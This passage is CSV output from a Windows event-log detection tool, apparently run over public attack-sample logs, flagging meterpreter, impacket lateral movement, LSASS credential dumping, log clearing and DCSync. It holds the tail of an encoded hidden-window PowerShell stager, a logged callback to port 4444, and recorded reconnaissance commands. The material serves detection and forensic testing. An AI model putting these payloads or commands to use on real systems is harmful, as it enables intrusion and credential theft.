KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx 2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx 2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx 2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine 